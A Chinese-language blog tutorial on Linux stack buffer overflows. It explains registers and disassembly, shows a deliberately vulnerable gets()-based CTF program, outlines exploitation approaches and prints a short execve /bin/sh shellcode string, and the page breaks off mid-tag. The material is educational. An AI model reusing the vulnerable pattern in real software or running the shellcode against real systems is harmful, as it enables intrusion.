<!DOCTYPE html><html class="theme-next gemini use-motion" lang="zh-Hans"><head><meta name="generator" content="Hexo 3.8.0"><script type="text/javascript" src="/js/src/clicklove.js"></script><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"><meta name="theme-color" content="#222"><script src="/lib/pace/pace.min.js?v=1.0.2"></script><link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>!function(e,t,o,c,a,i,n){e.DaoVoiceObject=a,e[a]=e[a]||function(){(e[a].q=e[a].q||[]).push(arguments)},e[a].l=1*new Date,i=t.createElement(o),n=t.getElementsByTagName(o)[0],i.async=1,i.src=c,i.charset="utf-8",n.parentNode.insertBefore(i,n)}(window,document,"script",("https:"==document.location.protocol?"https:":"http:")+"//widget.daovoice.io/widget/71c3d6a3.js","daovoice"),daovoice("init",{app_id:"71c3d6a3"}),daovoice("update")</script><link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css"><link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css"><link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css"><link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4"><link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4"><link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.4"><link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222"><meta name="keywords" content="Linux缓冲区溢出,"><link rel="alternate" href="/atom.xml" title="MrLiu · Blog" type="application/atom+xml"><meta name="description" content="什么是缓冲区溢出？ 我们知道，缓冲区就是暂时放置数据的地方，也就是说缓冲区其实就是变量，在程序开发中为了增加用户体验，往往需要用户输入，而用户的输入是不可控的，如果我们在程序中设定的缓冲区大小为32字节，那么用户输入超过32字节会怎么样呢？这样就会引发一个缓冲区溢出。通过溢出缓冲区可以控制栈中的ebp、eip等，这样就可以让目标系统实现特定的功能，拿到shell。这就是缓冲区溢出。"><meta name="keywords" content="Linux缓冲区溢出"><meta property="og:type" content="article"><meta property="og:title" content="Linux缓冲区溢出基础"><meta property="og:url" content="http://liuhaoan.github.io/2019/05/21/Linux缓冲区溢出基础.html"><meta property="og:site_name" content="MrLiu · Blog"><meta property="og:description" content="什么是缓冲区溢出？ 我们知道，缓冲区就是暂时放置数据的地方，也就是说缓冲区其实就是变量，在程序开发中为了增加用户体验，往往需要用户输入，而用户的输入是不可控的，如果我们在程序中设定的缓冲区大小为32字节，那么用户输入超过32字节会怎么样呢？这样就会引发一个缓冲区溢出。通过溢出缓冲区可以控制栈中的ebp、eip等，这样就可以让目标系统实现特定的功能，拿到shell。这就是缓冲区溢出。"><meta property="og:locale" content="zh-Hans"><meta property="og:image" content="http://liuhaoan.github.io/images/img/缓冲区溢出/zhan.jpg"><meta property="og:image" content="http://liuhaoan.github.io/images/img/缓冲区溢出/main.png"><meta property="og:image" content="http://liuhaoan.github.io/images/img/缓冲区溢出/func.png"><meta property="og:image" content="http://liuhaoan.github.io/images/img/缓冲区溢出/1.png"><meta property="og:image" content="http://liuhaoan.github.io/images/img/缓冲区溢出/2.png"><meta property="og:updated_time" content="2019-05-21T09:56:38.892Z"><meta name="twitter:card" content="summary"><meta name="twitter:title" content="Linux缓冲区溢出基础"><meta name="twitter:description" content="什么是缓冲区溢出？ 我们知道，缓冲区就是暂时放置数据的地方，也就是说缓冲区其实就是变量，在程序开发中为了增加用户体验，往往需要用户输入，而用户的输入是不可控的，如果我们在程序中设定的缓冲区大小为32字节，那么用户输入超过32字节会怎么样呢？这样就会引发一个缓冲区溢出。通过溢出缓冲区可以控制栈中的ebp、eip等，这样就可以让目标系统实现特定的功能，拿到shell。这就是缓冲区溢出。"><meta name="twitter:image" content="http://liuhaoan.github.io/images/img/缓冲区溢出/zhan.jpg"><script type="text/javascript" id="hexo.configurations">var NexT=window.NexT||{},CONFIG={root:"/",scheme:"Gemini",version:"5.1.4",sidebar:{position:"left",display:"post",offset:12,b2t:!1,scrollpercent:!1,onmobile:!1},fancybox:!0,tabs:!0,motion:{enable:!0,async:!1,transition:{post_block:"fadeIn",post_header:"slideDownIn",post_body:"slideDownIn",coll_header:"slideLeftIn",sidebar:"slideUpIn"}},duoshuo:{userId:"0",author:"博主"},algolia:{applicationID:"",apiKey:"",indexName:"",hits:{per_page:10},labels:{input_placeholder:"Search for Posts",hits_empty:"We didn't find any results for the search: ${query}",hits_stats:"${hits} results found in ${time} ms"}}}</script><link rel="canonical" href="http://liuhaoan.github.io/2019/05/21/Linux缓冲区溢出基础.html"><title>Linux缓冲区溢出基础 | MrLiu · Blog</title></head><body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans"><div class="container sidebar-position-left page-post-detail"><div class="headband"></div> <a href="/" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewbox="0 0 250 250" style="fill:#151513;color:#fff;position:absolute;top:0;border:0;right:0" aria-hidden="true"><path d="M0 0 115 115 130 115 142 142 250 250 250 0Z"/><path d="M128.3 109C113.8 99.7 119 89.6 119 89.6 122 82.7 120.5 78.6 120.5 78.6 119.2 72 123.4 76.3 123.4 76.3 127.3 80.9 125.5 87.3 125.5 87.3 122.9 97.6 130.6 101.9 134.4 103.2" fill="currentColor" style="transform-origin:130px 106px" class="octo-arm"/><path d="M115 115C114.9 115.1 118.7 116.5 119.8 115.4L133.7 101.6C136.9 99.2 139.9 98.4 142.2 98.6 133.8 88 127.5 74.4 143.8 58 148.5 53.4 154 51.2 159.7 51 160.3 49.4 163.2 43.6 171.4 40.1 171.4 40.1 176.1 42.5 178.8 56.2 183.1 58.6 187.2 61.8 190.9 65.4 194.5 69 197.7 73.2 200.1 77.6 213.8 80.2 216.3 84.9 216.3 84.9 212.7 93.1 206.9 96 205.4 96.6 205.1 102.4 203 107.8 198.3 112.5 181.9 128.9 168.3 122.5 157.7 114.1 157.9 116.9 156.7 120.9 152.7 124.9L141 136.5C139.8 137.7 141.6 141.9 141.8 141.8Z" fill="currentColor" class="octo-body"/></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style><header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="header-inner"><div class="site-brand-wrapper"><div class="site-meta"><div class="custom-logo-site-title"><a href="/" class="brand" rel="start"><span class="logo-line-before"><i></i></span> <span class="site-title">MrLiu · Blog</span><span class="logo-line-after"><i></i></span></a></div><p class="site-subtitle"></p></div><div class="site-nav-toggle"> <button><span class="btn-bar"></span><span class="btn-bar"></span><span class="btn-bar"></span></button></div></div><nav class="site-nav"><ul id="menu" class="menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i><br> 首页</a></li><li class="menu-item menu-item-大事年表"><a href="/timelines" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i><br> 大事年表</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i><br> 关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i><br> 标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i><br> 分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i><br> 归档</a></li><li class="menu-item menu-item-search"><a href="javascript:;" class="popup-trigger"><i class="menu-item-icon fa fa-search fa-fw"></i><br> 搜索</a></li></ul><div class="site-search"><div class="popup search-popup local-search-popup"><div class="local-search-header clearfix"><span class="search-icon"><i class="fa fa-search"></i></span><span class="popup-btn-close"><i class="fa fa-times-circle"></i></span><div class="local-search-input-wrapper"> <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input"></div></div><div id="local-search-result"></div></div></div></nav></div></header><main id="main" class="main"><div class="main-inner"><div class="content-wrap"><div id="content" class="content"><div id="posts" class="posts-expand"><article class="post post-type-normal" itemscope itemtype="http://schema.org/Article"><div class="post-block"><link itemprop="mainEntityOfPage" href="http://liuhaoan.github.io/2019/05/21/Linux缓冲区溢出基础.html"><span hidden itemprop="author" itemscope itemtype="http://schema.org/Person"><meta itemprop="name" content="MrLiu"><meta itemprop="description" content><meta itemprop="image" content="/images/logo.jpg"></span><span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization"><meta itemprop="name" content="MrLiu · Blog"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">Linux缓冲区溢出基础</h1><div class="post-meta"><span class="post-time"><span class="post-meta-item-icon"><i class="fa fa-calendar-o"></i></span> <span class="post-meta-item-text">发表于</span> <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-05-21T16:06:11+08:00">2019-05-21</time></span> <span class="post-category"><span class="post-meta-divider">|</span><span class="post-meta-item-icon"><i class="fa fa-folder-o"></i></span> <span class="post-meta-item-text">分类于</span> <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/Linux缓冲区溢出/" itemprop="url" rel="index"><span itemprop="name">Linux缓冲区溢出</span></a></span></span> <span class="post-meta-divider">|</span><span class="page-pv"><i class="fa fa-file-o"></i> 浏览<span class="busuanzi-value" id="busuanzi_value_page_pv"></span> 次</span><div class="post-wordcount"><span class="post-meta-item-icon"><i class="fa fa-file-word-o"></i></span> <span class="post-meta-item-text">字数统计&#58;</span> <span title="字数统计">1.9k</span> <span class="post-meta-divider">|</span><span class="post-meta-item-icon"><i class="fa fa-clock-o"></i></span> <span class="post-meta-item-text">阅读时长 &asymp;</span> <span title="阅读时长">7</span></div></div></header><div class="post-body" itemprop="articleBody"><h1 id="什么是缓冲区溢出？"><a href="#什么是缓冲区溢出？" class="headerlink" title="什么是缓冲区溢出？"></a>什么是缓冲区溢出？</h1><blockquote><p>我们知道，缓冲区就是暂时放置数据的地方，也就是说缓冲区其实就是变量，在程序开发中为了增加用户体验，往往需要用户输入，而用户的输入是不可控的，如果我们在程序中设定的缓冲区大小为32字节，那么用户输入超过32字节会怎么样呢？这样就会引发一个缓冲区溢出。通过溢出缓冲区可以控制栈中的ebp、eip等，这样就可以让目标系统实现特定的功能，拿到shell。这就是缓冲区溢出。</p></blockquote><a id="more"></a><h1 id="如何实现缓冲区溢出？"><a href="#如何实现缓冲区溢出？" class="headerlink" title="如何实现缓冲区溢出？"></a>如何实现缓冲区溢出？</h1><blockquote><p>要实现缓冲区溢出，我们首先要有栈、汇编语言、寄存器等基础</p></blockquote><p><img src="/images/img/缓冲区溢出/zhan.jpg" alt="栈结构"></p><ul><li>esp：栈顶指针，也叫栈指针</li><li>ebp：栈底指针</li><li>eip：返回地址指针</li></ul><h4 id="下面用一个例子来解释汇编语言"><a href="#下面用一个例子来解释汇编语言" class="headerlink" title="下面用一个例子来解释汇编语言"></a>下面用一个例子来解释汇编语言</h4><ul><li>C语言代码如下</li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">swap</span><span class="params">(<span class="keyword">int</span> *xp, <span class="keyword">int</span> *yp)</span></span>&#123;</span><br><span class="line">    <span class="keyword">int</span> x = *xp;</span><br><span class="line">    <span class="keyword">int</span> y = *yp;</span><br><span class="line"></span><br><span class="line">    *yp = x;</span><br><span class="line">    *xp = y;</span><br><span class="line">    <span class="keyword">return</span> x + y;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span>&#123;</span><br><span class="line">    <span class="keyword">int</span> x = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">int</span> y = <span class="number">2</span>;</span><br><span class="line">    <span class="keyword">int</span> sum = swap(&amp;x, &amp;y);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="下面是反汇编之后的汇编代码"><a href="#下面是反汇编之后的汇编代码" class="headerlink" title="下面是反汇编之后的汇编代码"></a>下面是反汇编之后的汇编代码</h5><ul><li>swap函数</li></ul><figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00000000</span> &lt;_swap&gt;:</span><br><span class="line">   <span class="number">0</span>:   <span class="number">55</span>                      push   <span class="meta">%</span>ebp</span><br><span class="line">   <span class="number">1</span>:   <span class="number">89</span> e<span class="number">5</span>                   mov    <span class="meta">%</span>esp,<span class="meta">%</span>ebp  <span class="comment">//保存ebp的值并设置帧指针</span></span><br><span class="line">   <span class="number">3</span>:   <span class="number">83</span> ec <span class="number">10</span>                <span class="keyword">sub</span>    $<span class="number">0</span>x<span class="number">10</span>,<span class="meta">%</span>esp <span class="comment">//栈分配了10个字节空间</span></span><br><span class="line">   <span class="number">6</span>:   <span class="number">8</span>b <span class="number">45</span> <span class="number">08</span>                mov    <span class="number">0</span>x<span class="number">8</span><span class="comment">(%ebp)</span>,<span class="meta">%</span>eax <span class="comment">//在当前的帧指针向上8个字节，也就是1的地址，即第一个参数 </span></span><br><span class="line">   <span class="number">9</span>:   <span class="number">8</span>b <span class="number">00</span>                   mov    <span class="comment">(%eax)</span>,<span class="meta">%</span>eax <span class="comment">//将1的值存储在eax寄存器中</span></span><br><span class="line">   b:   <span class="number">89</span> <span class="number">45</span> fc                mov    <span class="meta">%</span>eax,<span class="number">-0</span>x<span class="number">4</span><span class="comment">(%ebp)</span> <span class="comment">//1的值储存在帧指针向下的4个字节，帧指针的基地址还存储着旧的ebp值</span></span><br><span class="line">   e:   <span class="number">8</span>b <span class="number">45</span> <span class="number">0</span>c                mov    <span class="number">0</span>xc<span class="comment">(%ebp)</span>,<span class="meta">%</span>eax <span class="comment">//帧指针向上12个字的地址，即第二个参数，也就是2的地址</span></span><br><span class="line">  <span class="number">11</span>:   <span class="number">8</span>b <span class="number">00</span>                   mov    <span class="comment">(%eax)</span>,<span class="meta">%</span>eax   <span class="comment">//将2的值存储在eax寄存器中</span></span><br><span class="line">  <span class="number">13</span>:   <span class="number">89</span> <span class="number">45</span> f<span class="number">8</span>                mov    <span class="meta">%</span>eax,<span class="number">-0</span>x<span class="number">8</span><span class="comment">(%ebp)</span> <span class="comment">//2的值存储在帧指针向下的8个字节</span></span><br><span class="line">  <span class="number">16</span>:   <span class="number">8</span>b <span class="number">45</span> <span class="number">0</span>c                mov    <span class="number">0</span>xc<span class="comment">(%ebp)</span>,<span class="meta">%</span>eax <span class="comment">//2的地址值存储在eax寄存器中</span></span><br><span class="line">  <span class="number">19</span>:   <span class="number">8</span>b <span class="number">55</span> fc                mov    <span class="number">-0</span>x<span class="number">4</span><span class="comment">(%ebp)</span>,<span class="meta">%</span>edx <span class="comment">//1的值存储在edx寄存器</span></span><br><span class="line">  <span class="number">1</span>c:   <span class="number">89</span> <span class="number">10</span>                   mov    <span class="meta">%</span>edx,<span class="comment">(%eax)</span> <span class="comment">//将1的值覆盖eax寄存器中2的地址所指向的值，注意这里是存储器取值，所以改写的是值</span></span><br><span class="line">  <span class="number">1</span>e:   <span class="number">8</span>b <span class="number">45</span> <span class="number">08</span>                mov    <span class="number">0</span>x<span class="number">8</span><span class="comment">(%ebp)</span>,<span class="meta">%</span>eax <span class="comment">//1的地址值存储在eax寄存器中</span></span><br><span class="line">  <span class="number">21</span>:   <span class="number">8</span>b <span class="number">55</span> f<span class="number">8</span>                mov    <span class="number">-0</span>x<span class="number">8</span><span class="comment">(%ebp)</span>,<span class="meta">%</span>edx <span class="comment">//2的值储存在edu寄存器中</span></span><br><span class="line">  <span class="number">24</span>:   <span class="number">89</span> <span class="number">10</span>                   mov    <span class="meta">%</span>edx,<span class="comment">(%eax)</span> <span class="comment">//将2的值覆盖eax寄存器中1的地址所指向的值</span></span><br><span class="line">  <span class="number">26</span>:   <span class="number">8</span>b <span class="number">45</span> f<span class="number">8</span>                mov    <span class="number">-0</span>x<span class="number">8</span><span class="comment">(%ebp)</span>,<span class="meta">%</span>eax <span class="comment">//2的值转移到eax寄存器中</span></span><br><span class="line">  <span class="number">29</span>:   <span class="number">8</span>b <span class="number">55</span> fc                mov    <span class="number">-0</span>x<span class="number">4</span><span class="comment">(%ebp)</span>,<span class="meta">%</span>edx <span class="comment">//1的值转移到edx寄存器中</span></span><br><span class="line">  <span class="number">2</span>c:   <span class="number">01</span> d<span class="number">0</span>                   add    <span class="meta">%</span>edx,<span class="meta">%</span>eax</span><br><span class="line"><span class="comment">//注解④</span></span><br><span class="line">  <span class="number">2</span>e:   c<span class="number">9</span>                      leave  </span><br><span class="line">  <span class="number">2</span>f:   c<span class="number">3</span>                      ret</span><br></pre></td></tr></table></figure><ul><li>main函数</li></ul><figure class="highlight mel"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00000030</span> &lt;_main&gt;:</span><br><span class="line">  <span class="number">30</span>:   <span class="number">55</span>                      push   %ebp <span class="comment">//帧指针入栈，保存先前的%ebp的值</span></span><br><span class="line">  <span class="number">31</span>:   <span class="number">89</span> e5                   mov    %esp,%ebp <span class="comment">//栈指针存放的地址值设置为帧指针存放的地址值，注解①</span></span><br><span class="line">  <span class="number">33</span>:   <span class="number">83</span> e4 f0                and    $0xfffffff0,%esp  <span class="comment">//栈指针的地址值的最后一位设置为0</span></span><br><span class="line">  <span class="number">36</span>:   <span class="number">83</span> ec <span class="number">20</span>                sub    $0x20,%esp <span class="comment">//栈分配20字节的空间，注解②</span></span><br><span class="line">  <span class="number">39</span>:   e8 <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>          call   <span class="number">3</span>e &lt;_main+<span class="number">0xe</span>&gt; <span class="comment">//跳转到地址为3e的指令，也就是下一条指令</span></span><br><span class="line">  <span class="number">3</span>e:   c7 <span class="number">44</span> <span class="number">24</span> <span class="number">18</span> <span class="number">01</span> <span class="number">00</span> <span class="number">00</span>    movl   $0x1,<span class="number">0x18</span>(%esp) <span class="comment">//从栈指针的地址向上18个字节开始，存储4个字节的int值， 即18 ~ 22为1的存储地址，这里超过了20，但是因为之前有一条call指令push了返回地址所以实际是分配了24个字节</span></span><br><span class="line">  <span class="number">45</span>:   <span class="number">00</span> </span><br><span class="line">  <span class="number">46</span>:   c7 <span class="number">44</span> <span class="number">24</span> <span class="number">14</span> <span class="number">02</span> <span class="number">00</span> <span class="number">00</span>    movl   $0x2,<span class="number">0x14</span>(%esp) <span class="comment">//同上， 14 ~ 18 是2的存储地址</span></span><br><span class="line">  <span class="number">4</span>d:   <span class="number">00</span> </span><br><span class="line">  <span class="number">4</span>e:   <span class="number">8</span>d <span class="number">44</span> <span class="number">24</span> <span class="number">14</span>             lea    <span class="number">0x14</span>(%esp),%eax <span class="comment">//将2的地址赋给%eax寄存器</span></span><br><span class="line">  <span class="number">52</span>:   <span class="number">89</span> <span class="number">44</span> <span class="number">24</span> <span class="number">04</span>             mov    %eax,<span class="number">0x4</span>(%esp)  <span class="comment">//2的地址存储在栈指针向上的4个字节开始，指针为4个字节</span></span><br><span class="line">  <span class="number">56</span>:   <span class="number">8</span>d <span class="number">44</span> <span class="number">24</span> <span class="number">18</span>             lea    <span class="number">0x18</span>(%esp),%eax <span class="comment">//同上，1的地址赋给%eax寄存器</span></span><br><span class="line">  <span class="number">5</span>a:   <span class="number">89</span> <span class="number">04</span> <span class="number">24</span>                mov    %eax,(%esp) <span class="comment">//1的地址直接存储在栈指针上面，注解③</span></span><br><span class="line">  <span class="number">5</span>d:   e8 <span class="number">9</span>e ff ff ff          call   <span class="number">0</span> &lt;_swap&gt; <span class="comment">//调用swap函数</span></span><br><span class="line">  <span class="number">62</span>:   <span class="number">89</span> <span class="number">44</span> <span class="number">24</span> <span class="number">1</span>c             mov    %eax,<span class="number">0x1c</span>(%esp)</span><br><span class="line">  <span class="number">66</span>:   b8 <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>          mov    $0x0,%eax</span><br><span class="line">  <span class="number">6</span>b:   c9                      leave  </span><br><span class="line">  <span class="number">6</span>c:   c3                      ret    </span><br><span class="line">  <span class="number">6</span>d:   <span class="number">90</span>                      nop</span><br><span class="line">  <span class="number">6</span>e:   <span class="number">90</span>                      nop</span><br><span class="line">  <span class="number">6</span>f:   <span class="number">90</span>                      nop</span><br></pre></td></tr></table></figure><p>详情参考此文章：<a href="https://blog.csdn.net/laughing2333/article/details/51038573?tdsourcetag=s_pctim_aiomsg" title="CSAPP之栈帧结构理解" target="_blank" rel="noopener">CSAPP之栈帧结构理解</a></p><h4 id="通过以上的学习，我们就能初步的看懂一些简单的汇编语言了，那么道理如何让缓冲区溢出，并且达到自己想要的目的呢？"><a href="#通过以上的学习，我们就能初步的看懂一些简单的汇编语言了，那么道理如何让缓冲区溢出，并且达到自己想要的目的呢？" class="headerlink" title="通过以上的学习，我们就能初步的看懂一些简单的汇编语言了，那么道理如何让缓冲区溢出，并且达到自己想要的目的呢？"></a>通过以上的学习，我们就能初步的看懂一些简单的汇编语言了，那么道理如何让缓冲区溢出，并且达到自己想要的目的呢？</h4><blockquote><p>我们知道eip是返回地址，也就是说它是程序下一跳的地址，那么我们就可以得出结论：通过缓冲区溢出，覆盖掉eip，这样就可以实现控制eip返回地址了，既然下一跳的地址都被我们控制了，那不是我们想让程序怎么执行就怎么执行了吗？</p></blockquote><h3 id="下面我们通过实验来讲解"><a href="#下面我们通过实验来讲解" class="headerlink" title="下面我们通过实验来讲解"></a>下面我们通过实验来讲解</h3><ul><li>C语言程序如下</li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">func</span><span class="params">(<span class="keyword">int</span> key)</span></span>&#123;</span><br><span class="line">	<span class="keyword">char</span> overflowme[<span class="number">32</span>];</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"overflow me : "</span>);</span><br><span class="line">	gets(overflowme);	<span class="comment">// smash me!</span></span><br><span class="line">	<span class="keyword">if</span>(key == <span class="number">0xcafebabe</span>)&#123;</span><br><span class="line">		system(<span class="string">"/bin/sh"</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span>&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"Nah..\n"</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span>* argv[])</span></span>&#123;</span><br><span class="line">	func(<span class="number">0xdeadbeef</span>);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="分析次程序可知，永远都不可能执行system命令的，但是我们可以通过缓冲区溢出来实现，具体的实现方法有很多种"><a href="#分析次程序可知，永远都不可能执行system命令的，但是我们可以通过缓冲区溢出来实现，具体的实现方法有很多种" class="headerlink" title="分析次程序可知，永远都不可能执行system命令的，但是我们可以通过缓冲区溢出来实现，具体的实现方法有很多种"></a>分析次程序可知，永远都不可能执行system命令的，但是我们可以通过缓冲区溢出来实现，具体的实现方法有很多种</h5><ul><li><p>覆盖func形参为0xcafebabe</p><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">eip随意 + 填充<span class="number">4</span>字节 + 参数<span class="number">1</span>地址（<span class="number">0xcafebabe</span>）</span><br></pre></td></tr></table></figure></li><li><p>直接调用system拿shell</p><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">system</span>地址（eip） + 执行完<span class="built_in">system</span>后下一跳 + <span class="built_in">system</span>参数<span class="number">1</span>（/bin/<span class="keyword">sh</span>）</span><br></pre></td></tr></table></figure></li><li><p>找出当前esp地址（eip后面就是esp）</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">esp</span>地址（下一跳<span class="built_in">eip</span>） + <span class="keyword">nop</span>滑板（“\x90”） + shellcode（相当于system那条命令的<span class="number">16</span>进制代码）</span><br></pre></td></tr></table></figure></li><li><p>··········这里就不一一例举了，当然我也是个菜鸟，知道的也不多</p></li></ul><h4 id="当然根据编译时开启的防护与系统防护的不同，我们使用的方法也不同"><a href="#当然根据编译时开启的防护与系统防护的不同，我们使用的方法也不同" class="headerlink" title="当然根据编译时开启的防护与系统防护的不同，我们使用的方法也不同"></a>当然根据编译时开启的防护与系统防护的不同，我们使用的方法也不同</h4><p>具体请看<a href="https://www.jianshu.com/p/a659924515f7?tdsourcetag=s_pctim_aiomsg" title="CTF中pwn题的搭建" target="_blank" rel="noopener">CTF中pwn题的搭建</a></p><p>这里给出一个简短的shellcode代码<br></p><figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">"<span class="symbol">\x</span>31<span class="symbol">\x</span>c9<span class="symbol">\x</span>f7<span class="symbol">\x</span>e1<span class="symbol">\x</span>51<span class="symbol">\x</span>68<span class="symbol">\x</span>2f<span class="symbol">\x</span>2f<span class="symbol">\x</span>73<span class="symbol">\x</span>68<span class="symbol">\x</span>68<span class="symbol">\x</span>2f<span class="symbol">\x</span>62<span class="symbol">\x</span>69<span class="symbol">\x</span>6e<span class="symbol">\x</span>89<span class="symbol">\x</span>e3<span class="symbol">\x</span>b0<span class="symbol">\x</span>0b<span class="symbol">\x</span>cd<span class="symbol">\x</span>80"</span><br></pre></td></tr></table></figure><p></p><h2 id="我们就通过找出当前esp地址来实现缓冲区溢出拿shell，这也是最基础的一种方法"><a href="#我们就通过找出当前esp地址来实现缓冲区溢出拿shell，这也是最基础的一种方法" class="headerlink" title="我们就通过找出当前esp地址来实现缓冲区溢出拿shell，这也是最基础的一种方法"></a>我们就通过找出当前esp地址来实现缓冲区溢出拿shell，这也是最基础的一种方法</h2><h4 id="首先我们通过gdb反汇编程序，分析一下该程序"><a href="#首先我们通过gdb反汇编程序，分析一下该程序" class="headerlink" title="首先我们通过gdb反汇编程序，分析一下该程序"></a>首先我们通过gdb反汇编程序，分析一下该程序</h4><p>在gdb中输入：<code>disas 函数名</code><br><img src="/images/img/缓冲区溢出/main.png" alt></p><p>可见：首先把0xdeadbeef压栈，然后调用func方法</p><p><img src="/images/img/缓冲区溢出/func.png" alt></p><p>分析程序可以让我们可以更快的拿到自己想要的东西，通过分析，我们可以确定之前所说的第一种溢出方案拿shell，这里就不演示了，后续的练习文章中可以看到。</p><h4 id="下面我们寻找溢出点"><a href="#下面我们寻找溢出点" class="headerlink" title="下面我们寻找溢出点"></a>下面我们寻找溢出点</h4><p>找溢出点比较麻烦，我们可以用python来帮助我们<br></p><figure class="highlight swift"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -<span class="built_in">c</span> '<span class="built_in">print</span>(<span class="string">"A"</span> * <span class="number">44</span>)'</span><br></pre></td></tr></table></figure><p></p><p>然后我们复制粘贴进去找溢出点</p><p><img src="/images/img/缓冲区溢出/1.png" 